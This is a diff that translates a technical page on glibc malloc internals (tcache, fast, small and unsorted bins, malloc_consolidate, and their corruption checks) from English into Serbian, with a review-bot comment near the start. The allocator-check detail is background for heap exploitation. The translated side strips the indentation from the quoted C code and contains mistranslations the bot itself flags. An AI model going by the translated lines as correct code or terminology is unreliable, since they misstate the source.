function actually calls `__libc_malloc`. This function will check the tcache to see if there is any available chunk of the desired size. If the re is it'll use it and if not it'll check if it's a single thread and in that case it'll call `_int_malloc` in the main arena, and if not it'll call `_int_malloc` in arena of the thread. +Funkcija `malloc` zapravo poziva `__libc_malloc`. Ova funkcija će proveriti tcache da vidi da li postoji bilo koji dostupni deo željene veličine. Ako postoji, koristiće ga, a ako ne, proveriće da li je u pitanju jedinstvena nit i u tom slučaju će pozvati `_int_malloc` u glavnoj areni, a ako ne, pozvaće `_int_malloc` u areni niti.
-__libc_malloc code - +__libc_malloc kod ```c // From https://github.com/bminor/glibc/blob/master/malloc/malloc.c 
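Review bot: the sub-steps of the allocation summary are flattened to the top level (`+1. Pokušava da generiše arenu ako ne postoji` / `+2. Ako postoji bilo koji fast bin deo ...` / `+1. Popunjava tcache sa drugim brzim delovima`), so a Markdown renderer will renumber them as one continuous ordered list and the reader can no longer tell that "fill tcache" happens inside step 2 of `_int_malloc`; keep the original indentation of the nested `1.`/`2.`/`3.` items. In the prose, "Nema provere objašnjenih u ovom rezimeu" is ungrammatical ("Nijedna provera nije objašnjena u ovom rezimeu"), and "jedinstvena nit" means "unique thread"; "single thread" should be "jedna nit" or "jednonitni proces". The list also mixes third person (`Proverava`, `Popunjava`) with imperatives (`podeli ga`, `dodaj ostatak`); use one voice. The blank line before the `__libc_malloc kod` fence is dropped here as well (`+__libc_malloc kod ```c`), which risks the same rendering problem noted for the free.md hunk.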
@@ -40,1707 +39,1660 @@ The `malloc` function actually calls `__libc_malloc`. This function will check t void * __libc_malloc (size_t bytes) { - mstate ar_ptr; - void *victim; +mstate ar_ptr; +void *victim; - _Static_assert (PTRDIFF_MAX <= SIZE_MAX / 2, - "PTRDIFF_MAX is not more than half of SIZE_MAX"); +_Static_assert (PTRDIFF_MAX <= SIZE_MAX / 2, +"PTRDIFF_MAX is not more than half of SIZE_MAX"); - if (!__malloc_initialized) - ptmalloc_init (); +if (!__malloc_initialized) +ptmalloc_init (); #if USE_TCACHE - /* int_free also calls request2size, be careful to not pad twice. */ - size_t tbytes = checked_request2size (bytes); - if (tbytes == 0) - { - __set_errno (ENOMEM); - return NULL; - } - size_t tc_idx = csize2tidx (tbytes); +/* int_free also calls request2size, be careful to not pad twice. */ +size_t tbytes = checked_request2size (bytes); +if (tbytes == 0) +{ +__set_errno (ENOMEM); +return NULL; +} +size_t tc_idx = csize2tidx (tbytes); - MAYBE_INIT_TCACHE (); +MAYBE_INIT_TCACHE (); - DIAG_PUSH_NEEDS_COMMENT; - if (tc_idx < mp_.tcache_bins - && tcache != NULL - && tcache->counts[tc_idx] > 0) - { - victim = tcache_get (tc_idx); - return tag_new_usable (victim); - } - DIAG_POP_NEEDS_COMMENT; +DIAG_PUSH_NEEDS_COMMENT; +if (tc_idx < mp_.tcache_bins +&& tcache != NULL +&& tcache->counts[tc_idx] > 0) +{ +victim = tcache_get (tc_idx); +return tag_new_usable (victim); +} +DIAG_POP_NEEDS_COMMENT; #endif - if (SINGLE_THREAD_P) - { - victim = tag_new_usable (_int_malloc (&main_arena, bytes)); - assert (!victim || chunk_is_mmapped (mem2chunk (victim)) || - &main_arena == arena_for_chunk (mem2chunk (victim))); - return victim; - } +if (SINGLE_THREAD_P) +{ +victim = tag_new_usable (_int_malloc (&main_arena, bytes)); +assert (!victim || chunk_is_mmapped (mem2chunk (victim)) || +&main_arena == arena_for_chunk (mem2chunk (victim))); +return victim; +} - arena_get (ar_ptr, bytes); +arena_get (ar_ptr, bytes); - victim = _int_malloc (ar_ptr, bytes); - /* Retry with another arena 
only if we were able to find a usable arena - before. */ - if (!victim && ar_ptr != NULL) - { - LIBC_PROBE (memory_malloc_retry, 1, bytes); - ar_ptr = arena_get_retry (ar_ptr, bytes); - victim = _int_malloc (ar_ptr, bytes); - } +victim = _int_malloc (ar_ptr, bytes); +/* Retry with another arena only if we were able to find a usable arena +before. */ +if (!victim && ar_ptr != NULL) +{ +LIBC_PROBE (memory_malloc_retry, 1, bytes); +ar_ptr = arena_get_retry (ar_ptr, bytes); +victim = _int_malloc (ar_ptr, bytes); +} - if (ar_ptr != NULL) - __libc_lock_unlock (ar_ptr->mutex); +if (ar_ptr != NULL) +__libc_lock_unlock (ar_ptr->mutex); - victim = tag_new_usable (victim); +victim = tag_new_usable (victim); - assert (!victim || chunk_is_mmapped (mem2chunk (victim)) || - ar_ptr == arena_for_chunk (mem2chunk (victim))); - return victim; +assert (!victim || chunk_is_mmapped (mem2chunk (victim)) || +ar_ptr == arena_for_chunk (mem2chunk (victim))); +return victim; } ``` -
-Note how it'll always tag the returned pointer with `tag_new_usable`, from the code: - +Napomena kako će uvek označiti vraćeni pokazivač sa `tag_new_usable`, iz koda: ```c - void *tag_new_usable (void *ptr) +void *tag_new_usable (void *ptr) - Allocate a new random color and use it to color the user region of - a chunk; this may include data from the subsequent chunk's header - if tagging is sufficiently fine grained. Returns PTR suitably - recolored for accessing the memory there. +Allocate a new random color and use it to color the user region of +a chunk; this may include data from the subsequent chunk's header +if tagging is sufficiently fine grained. Returns PTR suitably +recolored for accessing the memory there. ``` - ## \_int_malloc -This is the function that allocates memory using the other bins and top chunk. +Ovo je funkcija koja alocira memoriju koristeći druge binove i top chunk. -- Start +- Početak -It starts defining some vars and getting the real size the request memory space need to have: +Počinje definisanjem nekih varijabli i dobijanjem stvarne veličine koju traženi prostor za memoriju treba da ima:
_int_malloc start - ```c // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L3847 static void * _int_malloc (mstate av, size_t bytes) { - INTERNAL_SIZE_T nb; /* normalized request size */ - unsigned int idx; /* associated bin index */ - mbinptr bin; /* associated bin */ +INTERNAL_SIZE_T nb; /* normalized request size */ +unsigned int idx; /* associated bin index */ +mbinptr bin; /* associated bin */ - mchunkptr victim; /* inspected/selected chunk */ - INTERNAL_SIZE_T size; /* its size */ - int victim_index; /* its bin index */ +mchunkptr victim; /* inspected/selected chunk */ +INTERNAL_SIZE_T size; /* its size */ +int victim_index; /* its bin index */ - mchunkptr remainder; /* remainder from a split */ - unsigned long remainder_size; /* its size */ +mchunkptr remainder; /* remainder from a split */ +unsigned long remainder_size; /* its size */ - unsigned int block; /* bit map traverser */ - unsigned int bit; /* bit map traverser */ - unsigned int map; /* current word of binmap */ +unsigned int block; /* bit map traverser */ +unsigned int bit; /* bit map traverser */ +unsigned int map; /* current word of binmap */ - mchunkptr fwd; /* misc temp for linking */ - mchunkptr bck; /* misc temp for linking */ +mchunkptr fwd; /* misc temp for linking */ +mchunkptr bck; /* misc temp for linking */ #if USE_TCACHE - size_t tcache_unsorted_count; /* count of unsorted chunks processed */ +size_t tcache_unsorted_count; /* count of unsorted chunks processed */ #endif - /* - Convert request size to internal form by adding SIZE_SZ bytes - overhead plus possibly more to obtain necessary alignment and/or - to obtain a size of at least MINSIZE, the smallest allocatable - size. Also, checked_request2size returns false for request sizes - that are so large that they wrap around zero when padded and - aligned. 
- */ +/* +Convert request size to internal form by adding SIZE_SZ bytes +overhead plus possibly more to obtain necessary alignment and/or +to obtain a size of at least MINSIZE, the smallest allocatable +size. Also, checked_request2size returns false for request sizes +that are so large that they wrap around zero when padded and +aligned. +*/ - nb = checked_request2size (bytes); - if (nb == 0) - { - __set_errno (ENOMEM); - return NULL; - } +nb = checked_request2size (bytes); +if (nb == 0) +{ +__set_errno (ENOMEM); +return NULL; +} ``` -
### Arena -In the unlikely event that there aren't usable arenas, it uses `sysmalloc` to get a chunk from `mmap`: +U malo verovatnom slučaju da ne postoje upotrebljive arene, koristi `sysmalloc` da dobije deo iz `mmap`:
_int_malloc not arena - ```c // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L3885C3-L3893C6 /* There are no usable arenas. Fall back to sysmalloc to get a chunk from - mmap. */ - if (__glibc_unlikely (av == NULL)) - { - void *p = sysmalloc (nb, av); - if (p != NULL) - alloc_perturb (p, bytes); - return p; - } +mmap. */ +if (__glibc_unlikely (av == NULL)) +{ +void *p = sysmalloc (nb, av); +if (p != NULL) +alloc_perturb (p, bytes); +return p; +} ``` -
### Fast Bin -If the needed size is inside the Fast Bins sizes, try to use a chunk from the fast bin. Basically, based on the size, it'll find the fast bin index where valid chunks should be located, and if any, it'll return one of those.\ -Moreover, if tcache is enabled, it'll **fill the tcache bin of that size with fast bins**. +Ako je potrebna veličina unutar veličina Fast Bins, pokušajte da koristite deo iz fast bin. U suštini, na osnovu veličine, pronaći će indeks fast bin-a gde bi validni delovi trebali biti locirani, i ako ih ima, vratiće jedan od njih.\ +Štaviše, ako je tcache omogućena, **napuniće tcache bin te veličine sa fast bins**. -While performing these actions, some security checks are executed in here: +Tokom izvođenja ovih akcija, izvršavaju se neki bezbednosni provere: -- If the chunk is misaligned: `malloc(): unaligned fastbin chunk detected 2` -- If the forward chunk is misaligned: `malloc(): unaligned fastbin chunk detected` -- If the returned chunk has a size that isn't correct because of it's index in the fast bin: `malloc(): memory corruption (fast)` -- If any chunk used to fill the tcache is misaligned: `malloc(): unaligned fastbin chunk detected 3` +- Ako je deo neusklađen: `malloc(): unaligned fastbin chunk detected 2` +- Ako je napredni deo neusklađen: `malloc(): unaligned fastbin chunk detected` +- Ako vraćeni deo ima veličinu koja nije ispravna zbog svog indeksa u fast bin: `malloc(): memory corruption (fast)` +- Ako je bilo koji deo korišćen za punjenje tcache neusklađen: `malloc(): unaligned fastbin chunk detected 3`
_int_malloc fast bin - ```c // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L3895C3-L3967C6 /* - If the size qualifies as a fastbin, first check corresponding bin. - This code is safe to execute even if av is not yet initialized, so we - can try it without checking, which saves some time on this fast path. - */ +If the size qualifies as a fastbin, first check corresponding bin. +This code is safe to execute even if av is not yet initialized, so we +can try it without checking, which saves some time on this fast path. +*/ #define REMOVE_FB(fb, victim, pp) \ - do \ - { \ - victim = pp; \ - if (victim == NULL) \ - break; \ - pp = REVEAL_PTR (victim->fd); \ - if (__glibc_unlikely (pp != NULL && misaligned_chunk (pp))) \ - malloc_printerr ("malloc(): unaligned fastbin chunk detected"); \ - } \ - while ((pp = catomic_compare_and_exchange_val_acq (fb, pp, victim)) \ - != victim); \ +do \ +{ \ +victim = pp; \ +if (victim == NULL) \ +break; \ +pp = REVEAL_PTR (victim->fd); \ +if (__glibc_unlikely (pp != NULL && misaligned_chunk (pp))) \ +malloc_printerr ("malloc(): unaligned fastbin chunk detected"); \ +} \ +while ((pp = catomic_compare_and_exchange_val_acq (fb, pp, victim)) \ +!= victim); \ - if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ())) - { - idx = fastbin_index (nb); - mfastbinptr *fb = &fastbin (av, idx); - mchunkptr pp; - victim = *fb; +if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ())) +{ +idx = fastbin_index (nb); +mfastbinptr *fb = &fastbin (av, idx); +mchunkptr pp; +victim = *fb; - if (victim != NULL) - { - if (__glibc_unlikely (misaligned_chunk (victim))) - malloc_printerr ("malloc(): unaligned fastbin chunk detected 2"); +if (victim != NULL) +{ +if (__glibc_unlikely (misaligned_chunk (victim))) +malloc_printerr ("malloc(): unaligned fastbin chunk detected 2"); - if (SINGLE_THREAD_P) - *fb = REVEAL_PTR (victim->fd); - else - REMOVE_FB (fb, pp, victim); - if (__glibc_likely (victim 
!= NULL)) - { - size_t victim_idx = fastbin_index (chunksize (victim)); - if (__builtin_expect (victim_idx != idx, 0)) - malloc_printerr ("malloc(): memory corruption (fast)"); - check_remalloced_chunk (av, victim, nb); +if (SINGLE_THREAD_P) +*fb = REVEAL_PTR (victim->fd); +else +REMOVE_FB (fb, pp, victim); +if (__glibc_likely (victim != NULL)) +{ +size_t victim_idx = fastbin_index (chunksize (victim)); +if (__builtin_expect (victim_idx != idx, 0)) +malloc_printerr ("malloc(): memory corruption (fast)"); +check_remalloced_chunk (av, victim, nb); #if USE_TCACHE - /* While we're here, if we see other chunks of the same size, - stash them in the tcache. */ - size_t tc_idx = csize2tidx (nb); - if (tcache != NULL && tc_idx < mp_.tcache_bins) - { - mchunkptr tc_victim; +/* While we're here, if we see other chunks of the same size, +stash them in the tcache. */ +size_t tc_idx = csize2tidx (nb); +if (tcache != NULL && tc_idx < mp_.tcache_bins) +{ +mchunkptr tc_victim; - /* While bin not empty and tcache not full, copy chunks. */ - while (tcache->counts[tc_idx] < mp_.tcache_count - && (tc_victim = *fb) != NULL) - { - if (__glibc_unlikely (misaligned_chunk (tc_victim))) - malloc_printerr ("malloc(): unaligned fastbin chunk detected 3"); - if (SINGLE_THREAD_P) - *fb = REVEAL_PTR (tc_victim->fd); - else - { - REMOVE_FB (fb, pp, tc_victim); - if (__glibc_unlikely (tc_victim == NULL)) - break; - } - tcache_put (tc_victim, tc_idx); - } - } +/* While bin not empty and tcache not full, copy chunks. 
*/ +while (tcache->counts[tc_idx] < mp_.tcache_count +&& (tc_victim = *fb) != NULL) +{ +if (__glibc_unlikely (misaligned_chunk (tc_victim))) +malloc_printerr ("malloc(): unaligned fastbin chunk detected 3"); +if (SINGLE_THREAD_P) +*fb = REVEAL_PTR (tc_victim->fd); +else +{ +REMOVE_FB (fb, pp, tc_victim); +if (__glibc_unlikely (tc_victim == NULL)) +break; +} +tcache_put (tc_victim, tc_idx); +} +} #endif - void *p = chunk2mem (victim); - alloc_perturb (p, bytes); - return p; - } - } - } +void *p = chunk2mem (victim); +alloc_perturb (p, bytes); +return p; +} +} +} ``` -
### Small Bin -As indicated in a comment, small bins hold one size per index, therefore checking if a valid chunk is available is super fast, so after fast bins, small bins are checked. +Kao što je naznačeno u komentaru, mali binovi drže jednu veličinu po indeksu, tako da je provera da li je dostupna validna chunk veoma brza, pa se nakon brzih binova proveravaju mali binovi. -The first check is to find out if the requested size could be inside a small bin. In that case, get the corresponded **index** inside the smallbin and see if there is **any available chunk**. +Prva provera je da se utvrdi da li tražena veličina može biti unutar malog bina. U tom slučaju, uzmite odgovarajući **indeks** unutar smallbina i proverite da li postoji **bilo koja dostupna chunk**. -Then, a security check is performed checking: +Zatim se vrši bezbednosna provera: -- if `victim->bk->fd = victim`. To see that both chunks are correctly linked. +- if `victim->bk->fd = victim`. Da se vidi da su oba chunk-a ispravno povezana. -In that case, the chunk **gets the `inuse` bit,** the doubled linked list is fixed so this chunk disappears from it (as it's going to be used), and the non main arena bit is set if needed. +U tom slučaju, chunk **dobija `inuse` bit,** dvostruko povezana lista se ispravlja tako da ovaj chunk nestaje iz nje (jer će biti korišćen), a bit za ne glavnu arenu se postavlja ako je potrebno. -Finally, **fill the tcache index of the requested size** with other chunks inside the small bin (if any). +Na kraju, **popunite tcache indeks tražene veličine** sa drugim chunk-ovima unutar malog bina (ako ih ima).
_int_malloc small bin - ```c // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L3895C3-L3967C6 /* - If a small request, check regular bin. Since these "smallbins" - hold one size each, no searching within bins is necessary. - (For a large request, we need to wait until unsorted chunks are - processed to find best fit. But for small ones, fits are exact - anyway, so we can check now, which is faster.) - */ +If a small request, check regular bin. Since these "smallbins" +hold one size each, no searching within bins is necessary. +(For a large request, we need to wait until unsorted chunks are +processed to find best fit. But for small ones, fits are exact +anyway, so we can check now, which is faster.) +*/ - if (in_smallbin_range (nb)) - { - idx = smallbin_index (nb); - bin = bin_at (av, idx); +if (in_smallbin_range (nb)) +{ +idx = smallbin_index (nb); +bin = bin_at (av, idx); - if ((victim = last (bin)) != bin) - { - bck = victim->bk; - if (__glibc_unlikely (bck->fd != victim)) - malloc_printerr ("malloc(): smallbin double linked list corrupted"); - set_inuse_bit_at_offset (victim, nb); - bin->bk = bck; - bck->fd = bin; +if ((victim = last (bin)) != bin) +{ +bck = victim->bk; +if (__glibc_unlikely (bck->fd != victim)) +malloc_printerr ("malloc(): smallbin double linked list corrupted"); +set_inuse_bit_at_offset (victim, nb); +bin->bk = bck; +bck->fd = bin; - if (av != &main_arena) - set_non_main_arena (victim); - check_malloced_chunk (av, victim, nb); +if (av != &main_arena) +set_non_main_arena (victim); +check_malloced_chunk (av, victim, nb); #if USE_TCACHE - /* While we're here, if we see other chunks of the same size, - stash them in the tcache. */ - size_t tc_idx = csize2tidx (nb); - if (tcache != NULL && tc_idx < mp_.tcache_bins) - { - mchunkptr tc_victim; +/* While we're here, if we see other chunks of the same size, +stash them in the tcache. 
*/ +size_t tc_idx = csize2tidx (nb); +if (tcache != NULL && tc_idx < mp_.tcache_bins) +{ +mchunkptr tc_victim; - /* While bin not empty and tcache not full, copy chunks over. */ - while (tcache->counts[tc_idx] < mp_.tcache_count - && (tc_victim = last (bin)) != bin) - { - if (tc_victim != 0) - { - bck = tc_victim->bk; - set_inuse_bit_at_offset (tc_victim, nb); - if (av != &main_arena) - set_non_main_arena (tc_victim); - bin->bk = bck; - bck->fd = bin; +/* While bin not empty and tcache not full, copy chunks over. */ +while (tcache->counts[tc_idx] < mp_.tcache_count +&& (tc_victim = last (bin)) != bin) +{ +if (tc_victim != 0) +{ +bck = tc_victim->bk; +set_inuse_bit_at_offset (tc_victim, nb); +if (av != &main_arena) +set_non_main_arena (tc_victim); +bin->bk = bck; +bck->fd = bin; - tcache_put (tc_victim, tc_idx); - } - } - } +tcache_put (tc_victim, tc_idx); +} +} +} #endif - void *p = chunk2mem (victim); - alloc_perturb (p, bytes); - return p; - } - } +void *p = chunk2mem (victim); +alloc_perturb (p, bytes); +return p; +} +} ``` -
### malloc_consolidate -If it wasn't a small chunk, it's a large chunk, and in this case **`malloc_consolidate`** is called to avoid memory fragmentation. +Ako to nije bio mali deo, to je veliki deo, i u ovom slučaju **`malloc_consolidate`** se poziva da bi se izbegla fragmentacija memorije.
-malloc_consolidate call - +malloc_consolidate poziv ```c /* - If this is a large request, consolidate fastbins before continuing. - While it might look excessive to kill all fastbins before - even seeing if there is space available, this avoids - fragmentation problems normally associated with fastbins. - Also, in practice, programs tend to have runs of either small or - large requests, but less often mixtures, so consolidation is not - invoked all that often in most programs. And the programs that - it is called frequently in otherwise tend to fragment. - */ +If this is a large request, consolidate fastbins before continuing. +While it might look excessive to kill all fastbins before +even seeing if there is space available, this avoids +fragmentation problems normally associated with fastbins. +Also, in practice, programs tend to have runs of either small or +large requests, but less often mixtures, so consolidation is not +invoked all that often in most programs. And the programs that +it is called frequently in otherwise tend to fragment. +*/ - else - { - idx = largebin_index (nb); - if (atomic_load_relaxed (&av->have_fastchunks)) - malloc_consolidate (av); - } +else +{ +idx = largebin_index (nb); +if (atomic_load_relaxed (&av->have_fastchunks)) +malloc_consolidate (av); +} ``` -
-The malloc consolidate function basically removes chunks from the fast bin and places them into the unsorted bin. After the next malloc these chunks will be organized in their respective small/fast bins. +Funkcija malloc consolidate u suštini uklanja delove iz brze kante i smešta ih u nesortiranu kantu. Nakon sledećeg malloc-a, ovi delovi će biti organizovani u svojim odgovarajućim malim/brzim kantama. -Note that if while removing these chunks, if they are found with previous or next chunks that aren't in use they will be **unliked and merged** before placing the final chunk in the **unsorted** bin. +Napomena: ako se prilikom uklanjanja ovih delova otkriju prethodni ili sledeći delovi koji nisu u upotrebi, oni će biti **unlinkovani i spojeni** pre nego što se konačni deo stavi u **nesortiranu** kantu. -For each fast bin chunk a couple of security checks are performed: +Za svaki deo iz brze kante vrši se nekoliko bezbednosnih provera: -- If the chunk is unaligned trigger: `malloc_consolidate(): unaligned fastbin chunk detected` -- If the chunk has a different size that the one it should because of the index it's in: `malloc_consolidate(): invalid chunk size` -- If the previous chunk is not in use and the previous chunk has a size different of the one indicated by `prev_chunk`: `corrupted size vs. prev_size in fastbins` +- Ako je deo neporavnat: `malloc_consolidate(): unaligned fastbin chunk detected` +- Ako deo ima drugačiju veličinu od one koju bi trebao imati zbog indeksa u kojem se nalazi: `malloc_consolidate(): invalid chunk size` +- Ako prethodni deo nije u upotrebi i prethodni deo ima veličinu koja se razlikuje od one koju označava `prev_chunk`: `corrupted size vs. prev_size in fastbins`
-malloc_consolidate function - +malloc_consolidate funkcija ```c // https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L4810C1-L4905C2 static void malloc_consolidate(mstate av) { - mfastbinptr* fb; /* current fastbin being consolidated */ - mfastbinptr* maxfb; /* last fastbin (for loop control) */ - mchunkptr p; /* current chunk being consolidated */ - mchunkptr nextp; /* next chunk to consolidate */ - mchunkptr unsorted_bin; /* bin header */ - mchunkptr first_unsorted; /* chunk to link to */ +mfastbinptr* fb; /* current fastbin being consolidated */ +mfastbinptr* maxfb; /* last fastbin (for loop control) */ +mchunkptr p; /* current chunk being consolidated */ +mchunkptr nextp; /* next chunk to consolidate */ +mchunkptr unsorted_bin; /* bin header */ +mchunkptr first_unsorted; /* chunk to link to */ - /* These have same use as in free() */ - mchunkptr nextchunk; - INTERNAL_SIZE_T size; - INTERNAL_SIZE_T nextsize; - INTERNAL_SIZE_T prevsize; - int nextinuse; +/* These have same use as in free() */ +mchunkptr nextchunk; +INTERNAL_SIZE_T size; +INTERNAL_SIZE_T nextsize; +INTERNAL_SIZE_T prevsize; +int nextinuse; - atomic_store_relaxed (&av->have_fastchunks, false); +atomic_store_relaxed (&av->have_fastchunks, false); - unsorted_bin = unsorted_chunks(av); +unsorted_bin = unsorted_chunks(av); - /* - Remove each chunk from fast bin and consolidate it, placing it - then in unsorted bin. Among other reasons for doing this, - placing in unsorted bin avoids needing to calculate actual bins - until malloc is sure that chunks aren't immediately going to be - reused anyway. - */ +/* +Remove each chunk from fast bin and consolidate it, placing it +then in unsorted bin. Among other reasons for doing this, +placing in unsorted bin avoids needing to calculate actual bins +until malloc is sure that chunks aren't immediately going to be +reused anyway. 
+*/ - maxfb = &fastbin (av, NFASTBINS - 1); - fb = &fastbin (av, 0); - do { - p = atomic_exchange_acquire (fb, NULL); - if (p != 0) { - do { - { - if (__glibc_unlikely (misaligned_chunk (p))) - malloc_printerr ("malloc_consolidate(): " - "unaligned fastbin chunk detected"); +maxfb = &fastbin (av, NFASTBINS - 1); +fb = &fastbin (av, 0); +do { +p = atomic_exchange_acquire (fb, NULL); +if (p != 0) { +do { +{ +if (__glibc_unlikely (misaligned_chunk (p))) +malloc_printerr ("malloc_consolidate(): " +"unaligned fastbin chunk detected"); - unsigned int idx = fastbin_index (chunksize (p)); - if ((&fastbin (av, idx)) != fb) - malloc_printerr ("malloc_consolidate(): invalid chunk size"); - } +unsigned int idx = fastbin_index (chunksize (p)); +if ((&fastbin (av, idx)) != fb) +malloc_printerr ("malloc_consolidate(): invalid chunk size"); +} - check_inuse_chunk(av, p); - nextp = REVEAL_PTR (p->fd); +check_inuse_chunk(av, p); +nextp = REVEAL_PTR (p->fd); - /* Slightly streamlined version of consolidation code in free() */ - size = chunksize (p); - nextchunk = chunk_at_offset(p, size); - nextsize = chunksize(nextchunk); +/* Slightly streamlined version of consolidation code in free() */ +size = chunksize (p); +nextchunk = chunk_at_offset(p, size); +nextsize = chunksize(nextchunk); - if (!prev_inuse(p)) { - prevsize = prev_size (p); - size += prevsize; - p = chunk_at_offset(p, -((long) prevsize)); - if (__glibc_unlikely (chunksize(p) != prevsize)) - malloc_printerr ("corrupted size vs. prev_size in fastbins"); - unlink_chunk (av, p); - } +if (!prev_inuse(p)) { +prevsize = prev_size (p); +size += prevsize; +p = chunk_at_offset(p, -((long) prevsize)); +if (__glibc_unlikely (chunksize(p) != prevsize)) +malloc_printerr ("corrupted size vs. 
prev_size in fastbins"); +unlink_chunk (av, p); +} - if (nextchunk != av->top) { - nextinuse = inuse_bit_at_offset(nextchunk, nextsize); +if (nextchunk != av->top) { +nextinuse = inuse_bit_at_offset(nextchunk, nextsize); - if (!nextinuse) { - size += nextsize; - unlink_chunk (av, nextchunk); - } else - clear_inuse_bit_at_offset(nextchunk, 0); +if (!nextinuse) { +size += nextsize; +unlink_chunk (av, nextchunk); +} else +clear_inuse_bit_at_offset(nextchunk, 0); - first_unsorted = unsorted_bin->fd; - unsorted_bin->fd = p; - first_unsorted->bk = p; +first_unsorted = unsorted_bin->fd; +unsorted_bin->fd = p; +first_unsorted->bk = p; - if (!in_smallbin_range (size)) { - p->fd_nextsize = NULL; - p->bk_nextsize = NULL; - } +if (!in_smallbin_range (size)) { +p->fd_nextsize = NULL; +p->bk_nextsize = NULL; +} - set_head(p, size | PREV_INUSE); - p->bk = unsorted_bin; - p->fd = first_unsorted; - set_foot(p, size); - } +set_head(p, size | PREV_INUSE); +p->bk = unsorted_bin; +p->fd = first_unsorted; +set_foot(p, size); +} - else { - size += nextsize; - set_head(p, size | PREV_INUSE); - av->top = p; - } +else { +size += nextsize; +set_head(p, size | PREV_INUSE); +av->top = p; +} - } while ( (p = nextp) != 0); +} while ( (p = nextp) != 0); - } - } while (fb++ != maxfb); +} +} while (fb++ != maxfb); } ``` -
-### Unsorted bin +### Nepoređeni kontejner -It's time to check the unsorted bin for a potential valid chunk to use. +Vreme je da proverimo nepoređeni kontejner za potencijalno validan deo koji možemo koristiti. -#### Start +#### Početak -This starts with a big for look that will be traversing the unsorted bin in the `bk` direction until it arrives til the end (the arena struct) with `while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))` +Ovo počinje velikom for petljom koja će prolaziti kroz nepoređeni kontejner u `bk` pravcu dok ne stigne do kraja (arena struktura) sa `while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))` -Moreover, some security checks are perform every time a new chunk is considered: +Pored toga, neki sigurnosni provere se vrše svaki put kada se razmatra novi deo: -- If the chunk size is weird (too small or too big): `malloc(): invalid size (unsorted)` -- If the next chunk size is weird (too small or too big): `malloc(): invalid next size (unsorted)` -- If the previous size indicated by the next chunk differs from the size of the chunk: `malloc(): mismatching next->prev_size (unsorted)` -- If not `victim->bck->fd == victim` or not `victim->fd == av` (arena): `malloc(): unsorted double linked list corrupted` - - As we are always checking the las one, it's `fd` should be pointing always to the arena struct. 
-- If the next chunk isn't indicating that the previous is in use: `malloc(): invalid next->prev_inuse (unsorted)` +- Ako je veličina dela čudna (previše mala ili previše velika): `malloc(): invalid size (unsorted)` +- Ako je veličina sledećeg dela čudna (previše mala ili previše velika): `malloc(): invalid next size (unsorted)` +- Ako se prethodna veličina koju označava sledeći deo razlikuje od veličine dela: `malloc(): mismatching next->prev_size (unsorted)` +- Ako nije `victim->bck->fd == victim` ili nije `victim->fd == av` (arena): `malloc(): unsorted double linked list corrupted` +- Kako uvek proveravamo poslednji, njegov `fd` bi trebao uvek da pokazuje na arena strukturu. +- Ako sledeći deo ne ukazuje da je prethodni u upotrebi: `malloc(): invalid next->prev_inuse (unsorted)`
-_int_malloc unsorted bin start - +_int_malloc početak nepoređenog kontejnera ```c /* - Process recently freed or remaindered chunks, taking one only if - it is exact fit, or, if this a small request, the chunk is remainder from - the most recent non-exact fit. Place other traversed chunks in - bins. Note that this step is the only place in any routine where - chunks are placed in bins. +Process recently freed or remaindered chunks, taking one only if +it is exact fit, or, if this a small request, the chunk is remainder from +the most recent non-exact fit. Place other traversed chunks in +bins. Note that this step is the only place in any routine where +chunks are placed in bins. - The outer loop here is needed because we might not realize until - near the end of malloc that we should have consolidated, so must - do so and retry. This happens at most once, and only when we would - otherwise need to expand memory to service a "small" request. - */ +The outer loop here is needed because we might not realize until +near the end of malloc that we should have consolidated, so must +do so and retry. This happens at most once, and only when we would +otherwise need to expand memory to service a "small" request. 
+*/ #if USE_TCACHE - INTERNAL_SIZE_T tcache_nb = 0; - size_t tc_idx = csize2tidx (nb); - if (tcache != NULL && tc_idx < mp_.tcache_bins) - tcache_nb = nb; - int return_cached = 0; +INTERNAL_SIZE_T tcache_nb = 0; +size_t tc_idx = csize2tidx (nb); +if (tcache != NULL && tc_idx < mp_.tcache_bins) +tcache_nb = nb; +int return_cached = 0; - tcache_unsorted_count = 0; +tcache_unsorted_count = 0; #endif - for (;; ) - { - int iters = 0; - while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av)) - { - bck = victim->bk; - size = chunksize (victim); - mchunkptr next = chunk_at_offset (victim, size); +for (;; ) +{ +int iters = 0; +while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av)) +{ +bck = victim->bk; +size = chunksize (victim); +mchunkptr next = chunk_at_offset (victim, size); - if (__glibc_unlikely (size <= CHUNK_HDR_SZ) - || __glibc_unlikely (size > av->system_mem)) - malloc_printerr ("malloc(): invalid size (unsorted)"); - if (__glibc_unlikely (chunksize_nomask (next) < CHUNK_HDR_SZ) - || __glibc_unlikely (chunksize_nomask (next) > av->system_mem)) - malloc_printerr ("malloc(): invalid next size (unsorted)"); - if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size)) - malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)"); - if (__glibc_unlikely (bck->fd != victim) - || __glibc_unlikely (victim->fd != unsorted_chunks (av))) - malloc_printerr ("malloc(): unsorted double linked list corrupted"); - if (__glibc_unlikely (prev_inuse (next))) - malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)"); +if (__glibc_unlikely (size <= CHUNK_HDR_SZ) +|| __glibc_unlikely (size > av->system_mem)) +malloc_printerr ("malloc(): invalid size (unsorted)"); +if (__glibc_unlikely (chunksize_nomask (next) < CHUNK_HDR_SZ) +|| __glibc_unlikely (chunksize_nomask (next) > av->system_mem)) +malloc_printerr ("malloc(): invalid next size (unsorted)"); +if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size)) +malloc_printerr 
